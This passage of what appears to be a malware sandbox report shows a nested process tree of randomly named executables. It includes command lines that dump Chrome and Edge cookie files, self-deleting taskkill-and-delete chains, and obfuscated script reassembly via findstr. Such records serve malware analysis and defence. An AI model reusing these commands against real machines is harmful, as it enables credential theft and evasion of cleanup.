                                                                                                                                                                                                                                                                                                                                                                          31⤵
                                                                                                                                                                                                                                                                                                                                                                            PID:9400
                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\Documents\jLOTVVrM0LYmMjiHDBHitCCE.exe
                                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\Documents\jLOTVVrM0LYmMjiHDBHitCCE.exe"
                                                                                                                                                                                                                                                                                                                                                                              32⤵
                                                                                                                                                                                                                                                                                                                                                                                PID:9924
                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\Documents\Tgrsory0hLmr_bpzuQjYEQLk.exe
                                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\Documents\Tgrsory0hLmr_bpzuQjYEQLk.exe"
                                                                                                                                                                                                                                                                                                                                                                              31⤵
                                                                                                                                                                                                                                                                                                                                                                                PID:9392
                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Documents\Tgrsory0hLmr_bpzuQjYEQLk.exe
                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\Documents\Tgrsory0hLmr_bpzuQjYEQLk.exe
                                                                                                                                                                                                                                                                                                                                                                                  32⤵
                                                                                                                                                                                                                                                                                                                                                                                    PID:10116
                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Documents\JzNfws_D_C_1__PpiDYUPkTm.exe
                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Documents\JzNfws_D_C_1__PpiDYUPkTm.exe"
                                                                                                                                                                                                                                                                                                                                                                                  31⤵
                                                                                                                                                                                                                                                                                                                                                                                    PID:9384
                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Documents\mEYtuLxX6j2o0bcQBa7j7g6H.exe
                                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\Documents\mEYtuLxX6j2o0bcQBa7j7g6H.exe"
                                                                                                                                                                                                                                                                                                                                                                                    31⤵
                                                                                                                                                                                                                                                                                                                                                                                      PID:9376
                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\Documents\AsXHAMjLpDUkPf_l1nQqGWXt.exe
                                                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\Documents\AsXHAMjLpDUkPf_l1nQqGWXt.exe"
                                                                                                                                                                                                                                                                                                                                                                                      31⤵
                                                                                                                                                                                                                                                                                                                                                                                        PID:9368
                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\Documents\nbdZJ7axZhhWzEIu2JnD90jo.exe
                                                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\Documents\nbdZJ7axZhhWzEIu2JnD90jo.exe"
                                                                                                                                                                                                                                                                                                                                                                                        31⤵
                                                                                                                                                                                                                                                                                                                                                                                          PID:9460
                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\Documents\hBpdif15uNmli89sAgPE5vId.exe
                                                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\Documents\hBpdif15uNmli89sAgPE5vId.exe"
                                                                                                                                                                                                                                                                                                                                                                                          31⤵
                                                                                                                                                                                                                                                                                                                                                                                            PID:9532
                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Documents\TF5eJbjjQhqZG6EQJsz9bmQw.exe
                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Documents\TF5eJbjjQhqZG6EQJsz9bmQw.exe"
                                                                                                                                                                                                                                                                                                                                                                                  26⤵
                                                                                                                                                                                                                                                                                                                                                                                    PID:5940
                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\1234.exe
                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Roaming\1234.exe 1234
                                                                                                                                                                                                                                                                                                                                                                                      27⤵
                                                                                                                                                                                                                                                                                                                                                                                        PID:7284
                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\Documents\JlvspoH51nRoesZrrBMQmRr4.exe
                                                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\Documents\JlvspoH51nRoesZrrBMQmRr4.exe"
                                                                                                                                                                                                                                                                                                                                                                                      26⤵
                                                                                                                                                                                                                                                                                                                                                                                        PID:5068
                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\Documents\UdhY_KIt9feLR3h4nkLhYD2Y.exe
                                                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\Documents\UdhY_KIt9feLR3h4nkLhYD2Y.exe"
                                                                                                                                                                                                                                                                                                                                                                                        26⤵
                                                                                                                                                                                                                                                                                                                                                                                          PID:4876
                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\Documents\UdhY_KIt9feLR3h4nkLhYD2Y.exe
                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\Documents\UdhY_KIt9feLR3h4nkLhYD2Y.exe
                                                                                                                                                                                                                                                                                                                                                                                            27⤵
                                                                                                                                                                                                                                                                                                                                                                                              PID:6312
                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\Documents\bGgkNEo7r8isPQw9CfXaqXW1.exe
                                                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\Documents\bGgkNEo7r8isPQw9CfXaqXW1.exe"
                                                                                                                                                                                                                                                                                                                                                                                            26⤵
                                                                                                                                                                                                                                                                                                                                                                                              PID:1176
                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\Documents\bGgkNEo7r8isPQw9CfXaqXW1.exe
                                                                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\Documents\bGgkNEo7r8isPQw9CfXaqXW1.exe"
                                                                                                                                                                                                                                                                                                                                                                                                27⤵
                                                                                                                                                                                                                                                                                                                                                                                                  PID:8776
                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\Documents\gE886zlrNkM5NnPzApwJZuOh.exe
                                                                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\Documents\gE886zlrNkM5NnPzApwJZuOh.exe"
                                                                                                                                                                                                                                                                                                                                                                                                26⤵
                                                                                                                                                                                                                                                                                                                                                                                                  PID:5336
                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /c taskkill /im gE886zlrNkM5NnPzApwJZuOh.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\gE886zlrNkM5NnPzApwJZuOh.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                                                                                                                                                                                                                                    27⤵
                                                                                                                                                                                                                                                                                                                                                                                                      PID:8684
                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                                                                                                                        taskkill /im gE886zlrNkM5NnPzApwJZuOh.exe /f
                                                                                                                                                                                                                                                                                                                                                                                                        28⤵
                                                                                                                                                                                                                                                                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                                                                                        PID:1184
                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Documents\IQYwfOoqp933VT2XihKpOWeS.exe
                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\Documents\IQYwfOoqp933VT2XihKpOWeS.exe"
                                                                                                                                                                                                                                                                                                                                                                                                    26⤵
                                                                                                                                                                                                                                                                                                                                                                                                      PID:7200
                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\Documents\IAOseqBMm3K4OIvQoC3gvztk.exe
                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\Documents\IAOseqBMm3K4OIvQoC3gvztk.exe"
                                                                                                                                                                                                                                                                                                                                                                                                      26⤵
                                                                                                                                                                                                                                                                                                                                                                                                        PID:4484
                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\Documents\1oNtB77Q1iBW8TzqdDQ6TmVV.exe
                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\Documents\1oNtB77Q1iBW8TzqdDQ6TmVV.exe"
                                                                                                                                                                                                                                                                                                                                                                                                        26⤵
                                                                                                                                                                                                                                                                                                                                                                                                          PID:7576
                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\Documents\N399991jiGbNZVarOqvkbwLg.exe
                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\Documents\N399991jiGbNZVarOqvkbwLg.exe"
                                                                                                                                                                                                                                                                                                                                                                                                          26⤵
                                                                                                                                                                                                                                                                                                                                                                                                            PID:4208
                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\4525732.exe
                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\4525732.exe"
                                                                                                                                                                                                                                                                                                                                                                                                              27⤵
                                                                                                                                                                                                                                                                                                                                                                                                                PID:6532
                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\Documents\ZqjR0OLayvWy9uBumipdN0CW.exe
                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\Documents\ZqjR0OLayvWy9uBumipdN0CW.exe"
                                                                                                                                                                                                                                                                                                                                                                                                              26⤵
                                                                                                                                                                                                                                                                                                                                                                                                                PID:580
                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                                                                                                                                                                  27⤵
                                                                                                                                                                                                                                                                                                                                                                                                                    PID:8388
                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                                                                                                                                                                    27⤵
                                                                                                                                                                                                                                                                                                                                                                                                                      PID:7552
                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                                                                                                                                                                      27⤵
                                                                                                                                                                                                                                                                                                                                                                                                                        PID:7976
                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                                                                                                                                                                        27⤵
                                                                                                                                                                                                                                                                                                                                                                                                                          PID:8664
                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\Documents\Exc3oKHEC8SDOJuj_UluO42r.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\Documents\Exc3oKHEC8SDOJuj_UluO42r.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                        26⤵
                                                                                                                                                                                                                                                                                                                                                                                                                          PID:4476
                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\Documents\bxtQIW6o5pL3n2UzR67SIL27.exe
                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\Documents\bxtQIW6o5pL3n2UzR67SIL27.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                          26⤵
                                                                                                                                                                                                                                                                                                                                                                                                                            PID:5820
                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\Documents\bxtQIW6o5pL3n2UzR67SIL27.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\Documents\bxtQIW6o5pL3n2UzR67SIL27.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              27⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                PID:7600
                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\Documents\mwFVecPRuSXUMU7LJ3ZmaoKY.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\Documents\mwFVecPRuSXUMU7LJ3ZmaoKY.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                              26⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                PID:5540
                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Documents\mwFVecPRuSXUMU7LJ3ZmaoKY.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\Documents\mwFVecPRuSXUMU7LJ3ZmaoKY.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                  27⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:7904
                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Documents\K_sMHgG2snZ55p1jUnfCXI2B.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Documents\K_sMHgG2snZ55p1jUnfCXI2B.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                  26⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:6472
                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\Documents\K_sMHgG2snZ55p1jUnfCXI2B.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\Documents\K_sMHgG2snZ55p1jUnfCXI2B.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      27⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:9172
                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /c taskkill /im K_sMHgG2snZ55p1jUnfCXI2B.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\K_sMHgG2snZ55p1jUnfCXI2B.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                                                                                                                                                                                                                                                                          28⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:9540
                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                              taskkill /im K_sMHgG2snZ55p1jUnfCXI2B.exe /f
                                                                                                                                                                                                                                                                                                                                                                                                                                              29⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                              • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:8664
                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\Documents\nnLEjxJpRqv53bkammupDnSG.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\Documents\nnLEjxJpRqv53bkammupDnSG.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                        26⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:5796
                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /c cmd < Sorrisi.tmp
                                                                                                                                                                                                                                                                                                                                                                                                                                            27⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:7900
                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                cmd
                                                                                                                                                                                                                                                                                                                                                                                                                                                28⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:8500
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                    findstr /V /R "^yNFefWPitqXbQXexaaaweTJMeyyzoIKOZcrabptodYbHejNKUaJtRjoktSZpRcZcdpbxUJWpgpLtcwKPaxnPYFWNhRgFpV$" Sapete.tmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                    29⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:8312
                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.004\Acre.exe.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                      Acre.exe.com k
                                                                                                                                                                                                                                                                                                                                                                                                                                                      29⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:7340
                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                        ping 127.0.0.1 -n 30
                                                                                                                                                                                                                                                                                                                                                                                                                                                        29⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Runs ping.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:5652
                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Documents\KZBzv8olMdnxaQqvFUU8O4x5.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Documents\KZBzv8olMdnxaQqvFUU8O4x5.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                  26⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:5852
                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\Documents\KZBzv8olMdnxaQqvFUU8O4x5.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\Documents\KZBzv8olMdnxaQqvFUU8O4x5.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                      27⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2540
                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\Documents\_mY4m6EhcEvDLsZOlF_IDvuQ.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\Documents\_mY4m6EhcEvDLsZOlF_IDvuQ.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                      26⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:8532
                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\Documents\_mY4m6EhcEvDLsZOlF_IDvuQ.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\Documents\_mY4m6EhcEvDLsZOlF_IDvuQ.exe" -a
                                                                                                                                                                                                                                                                                                                                                                                                                                                          27⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:736
                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\Documents\3Mgpo3H0qhUtdDnNcu1xxk7b.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\Documents\3Mgpo3H0qhUtdDnNcu1xxk7b.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                21⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:7688
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\5538156.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\5538156.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                    22⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:8092
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Documents\A5tAHxf6C7Kslj8hdXYFVqNx.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\Documents\A5tAHxf6C7Kslj8hdXYFVqNx.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                    21⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:6984
                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\Documents\tdH1QUwEjh88PGn_VAadi1Oz.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\Documents\tdH1QUwEjh88PGn_VAadi1Oz.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                      21⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:7164
                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                          22⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:5376
                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                            22⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:2872
                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                              22⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:3372
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                22⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:7888
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\Documents\GKsttbOkSH92fYCHunQZfi7f.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\Documents\GKsttbOkSH92fYCHunQZfi7f.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                21⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:7892
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Documents\GKsttbOkSH92fYCHunQZfi7f.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\Documents\GKsttbOkSH92fYCHunQZfi7f.exe" -a
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    22⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:7800
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Documents\znkyhAvPMhzXBdTe2HLo7PEG.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\Documents\znkyhAvPMhzXBdTe2HLo7PEG.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    21⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:7360
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\Documents\znkyhAvPMhzXBdTe2HLo7PEG.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\Documents\znkyhAvPMhzXBdTe2HLo7PEG.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        22⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:8652
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\Documents\ZvX_6bwMMcAfCyk5AfSA4_c9.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\Documents\ZvX_6bwMMcAfCyk5AfSA4_c9.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        21⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:4376
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\Documents\gPR93RO05vX9BN_259dCCL5x.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\Documents\gPR93RO05vX9BN_259dCCL5x.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          21⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:5616
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\Documents\gPR93RO05vX9BN_259dCCL5x.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\Documents\gPR93RO05vX9BN_259dCCL5x.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              22⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:8504
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\Documents\ETRVZTVf5_ybH1TEVYvEJHZP.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\Documents\ETRVZTVf5_ybH1TEVYvEJHZP.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              21⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:4920
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\Documents\ewMsNewtt0J6wG4DgxswUa3L.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\Documents\ewMsNewtt0J6wG4DgxswUa3L.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                21⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:6884
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /c taskkill /im ewMsNewtt0J6wG4DgxswUa3L.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\ewMsNewtt0J6wG4DgxswUa3L.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    22⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:8900
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        taskkill /im ewMsNewtt0J6wG4DgxswUa3L.exe /f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        23⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:4848
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Documents\aDQm23dwFH8Ou5eT69EJzj0Y.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\Documents\aDQm23dwFH8Ou5eT69EJzj0Y.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    21⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:8216
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\Documents\IcCu5AUxUN8k7bplcWQUXQp_.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\Documents\IcCu5AUxUN8k7bplcWQUXQp_.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      21⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:8252
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\Documents\IcCu5AUxUN8k7bplcWQUXQp_.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\Documents\IcCu5AUxUN8k7bplcWQUXQp_.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          22⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:8948
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\Documents\xsbnHFgQKgueXzNmf_0_nIoH.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\Documents\xsbnHFgQKgueXzNmf_0_nIoH.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          21⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:8304
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Documents\n2vbAobwQtEjWnrBeiEm11IU.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Documents\n2vbAobwQtEjWnrBeiEm11IU.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  16⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1736
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\Documents\n2vbAobwQtEjWnrBeiEm11IU.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\Documents\n2vbAobwQtEjWnrBeiEm11IU.exe" -a
